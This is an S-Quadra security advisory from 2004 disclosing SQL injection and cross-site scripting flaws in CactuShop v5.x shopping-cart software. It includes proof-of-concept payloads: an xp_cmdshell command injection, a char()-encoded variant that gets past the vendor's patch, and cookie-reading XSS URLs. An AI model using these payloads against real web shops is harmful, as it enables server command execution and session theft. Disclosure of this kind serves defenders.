Adv-20040331.txt

` S-Quadra Advisory #2004-03-31  
  
Topic: CactuSoft CactuShop v5.x shopping cart software multiple security  
vulnerabilities  
Severity: High  
Vendor URL: http://www.cactushop.com  
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040331.txt  
Release date: 31 Mar 2004  
  
1. DESCRIPTION  
  
CactuShop is an ASP application for running an e-commerce web site. It  
incorporates a databased catalogue system, front end pages for product  
navigation, back end pages for updating product details and robust  
basket code for memorizing product selections as a visitor moves around  
the web site. ASP software is designed to run on a Microsoft NT or Win  
2000 server and to use MS Access, MS SQL Server or MySQL as a backend.  
Please visit http://www.cactushop.com for information about CactuShop  
shopping cart.  
  
2. DETAILS  
  
-- Vulnerability 1: SQL Injection vulnerability  
  
An SQL Injection vulnerability has been found in following scripts :  
'mailorder.asp' and 'payonline.asp'. User supplied input parameter is  
'strItems' not filtered before being used in an SQL query. Thus the  
query modification through malformed input is possible.  
  
Successful exploitation of this vulnerability can enable an attacker  
to execute commands in the system (via MS SQL xp_cmdshell function).  
  
-- Vulnerability 2: Cross Site Scripting vulnerability found in  
'largeimage.asp'script  
  
By injecting specially crafted javascript code in url and tricking a  
user to visit it a remote attacker can steal user session id and gain  
access to user's personal data.  
  
--PoC code  
  
--Vulnerability 1:  
  
Platform: MS SQL Server as a backend  
  
Posting this data to 'payonline.asp' executes 'dir c:' command  
  
strAgain=yes&[email protected]&CD_Password=&  
CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&  
CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&  
numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&  
strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed  
  
-- Vulnerability 2:  
  
http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>  
  
3. FIX INFORMATION  
  
11 Mar 2004: S-Quadra alerted CactuSoft (CactuShop developers) on these  
issues.  
15 Mar 2004: CactuSoft response:  
  
"1) SQL Injection  
  
On payonline.asp and all mailorder pages the strItems field is now  
parsed for single-quote (') characters before being used with database  
queries. Single quotes are escaped (replaced with 2 single-quotes) to  
ensure SQL Injection won't work.  
  
2) Javascript Injection  
  
The strImageTag field is parse for HTML tags characters (< and >) and  
are removed from the string. This should ensure against <script> and any  
other HTML tags.  
  
This can be tested on the demo of the new CactuShop v5.1  
(http://www.cactushop.com/cs51/)."  
  
16 Mar 2004: S-Quadra tested patched version of CactuShop.  
Vulnerabilities not fixed. New PoC Code:  
  
For SQL Injection  
  
strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z  
  
For XSS:  
  
http://[target]/popuplargeimage.asp?strImageTag=<img+src="uploads/images_products_large/113.gif"%20onLoad="alert(document.cookie)">  
  
16 Mar 2004: S-Quadra alerted CactuSoft about new PoC Code.  
26 Mar 2004: S-Quadra alerted CactuSoft about new PoC Code.  
  
From 03.16.2004 Cactusoft dropped their communication with us so no  
further response has been received therefore no new Fix information is  
available.  
  
4. CREDITS  
  
Nick Gudov, chief security researcher at S-Quadra <[email protected]>  
has detected above mentioned vulnerabilities.  
  
5. ABOUT  
  
S-Quadra dedicates its substantial knowledge and resources to managing  
clients' IT security risks. S-Quadra audits and protection for software  
and networks implement pioneering methods and ground-breaking  
technologies.  
  
S-Quadra Advisory #2004-03-31  
`